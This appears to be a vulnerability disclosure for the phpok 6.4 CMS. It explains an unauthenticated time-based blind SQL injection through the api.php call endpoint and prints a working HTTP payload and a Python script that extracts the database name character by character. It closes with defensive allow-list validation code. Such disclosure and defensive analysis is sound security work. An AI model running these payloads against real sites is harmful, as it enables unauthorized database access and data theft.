There is a SQL injection in the function index_f() in phpok64/framework/api/call_control.php. This function calls the phpok() function, which contains a dynamic call.
The function index_f() receives its parameters in JSON format and can control which function is called dynamically. Although the names of the callable functions are stored in the database, the _arclist function among them is vulnerable.
In this way, we can use the _arclist function to call the _arc_condition function, which contains a great deal of conditional splicing of SQL statements.
In fact, there are many guards set up in this function and even across this CMS: the characters ', <, and > are escaped and the input is filtered. However, we can manage to bypass some of them, resulting in a serious SQL injection vulnerability. Besides, no login or privileges are required to trigger this vulnerability.
In this code fragment, the CMS splits our input on commas and then concatenates each fragment into the SQL statement. This means we cannot have commas in our payload. Therefore, I constructed the following payload.
```http
POST /api.php?c=call&f=index HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
Connection: close
Cookie: PHPSESSION=bd34va2vksdhvqr8t1sll4lva7; XDEBUG_SESSION=PHPSTORM
Content-Type: application/x-www-form-urlencoded
Content-Length: 138

data={"m_picplayer":{"_alias":"abc","fields_need":"CASE 1 WHEN (substr((select database()) from 1 for 1)=0x70) THEN sleep(5) ELSE 1 END"}}
```
Below are the results.
As we can see, when the condition is true, i.e. the database name starts with 0x70 (the letter p), a delay of 5 seconds is produced. Otherwise, nothing happens.
Then we can write a Python script to test the effect.
```python
import random
import requests
import time

url = "http://127.0.0.1/api.php?c=call&f=index"
result_str = ""

# Recover the database name one character position at a time.
for i in range(1, 30):
    time.sleep(1.0)
    print(i)
    # Try every printable ASCII value for this position.
    for j in range(32, 127):
        payload1 = (
            "{\"m_picplayer\":{\"_alias\":\"abc\",\"fields_need\":\""
            "CASE 1 WHEN (substr((select database()) from %d for 1)=" % i
            + hex(j)
            + ") THEN sleep(4) ELSE 1 END"
            + "\"}}"
        )
        time.sleep(0.15)
        data = {
            'data': payload1
        }
        time1 = time.time()
        res = requests.post(url, data=data)  # , proxies=proxies)
        time2 = time.time()
        # A response slower than the sleep() threshold means the guess was right.
        if time2 - time1 > 4:
            result_str += chr(j)
            print(result_str)
            break
```
One thing to note is that each payload must be different; otherwise the cache mechanism is triggered and the database query is not performed at all.
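As an added illustration from the defender's side (not phpok's own code), the following Python sketch shows the allow-list check that would neutralise this class of input: each comma-separated fragment of `fields_need` must be a bare identifier on a known column list before it is spliced into the query. The column names and the `picplayer` table name are assumptions made for the example.

```python
import json
import re

# Constructed allow-list of column names the picture-player query may expose.
# These names are assumptions for this example, not phpok's real schema.
ALLOWED_FIELDS = {"id", "title", "thumb", "url", "sort", "status"}

# A field entry must be a bare identifier: letters, digits and underscore only.
IDENT_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]{0,63}$")


def safe_fields(fields_need: str):
    """Split the comma-separated fields_need value the way the CMS does,
    but accept a fragment only if it is a bare identifier on the allow-list.
    Returns the validated, back-quoted column names, or raises ValueError
    so that no untrusted fragment ever reaches the SQL string."""
    names = []
    for raw in fields_need.split(","):
        name = raw.strip()
        if not IDENT_RE.match(name) or name not in ALLOWED_FIELDS:
            raise ValueError("rejected field fragment: %r" % raw)
        names.append("`%s`" % name)
    return names


def build_select(request_data: str, table: str = "picplayer") -> str:
    """Parse the JSON 'data' parameter and build the SELECT column list
    from validated identifiers only. Any rejected fragment aborts the query."""
    params = json.loads(request_data)
    fields_need = params["m_picplayer"].get("fields_need", "*")
    cols = "*" if fields_need == "*" else ", ".join(safe_fields(fields_need))
    return "SELECT %s FROM `%s`" % (cols, table)


def is_rejected(request_data: str) -> bool:
    """True if the request would be refused by the allow-list check."""
    try:
        build_select(request_data)
    except ValueError:
        return True
    return False
```

The time-based payload from the request above fails the identifier check (it contains spaces and parentheses), so it never reaches the query builder.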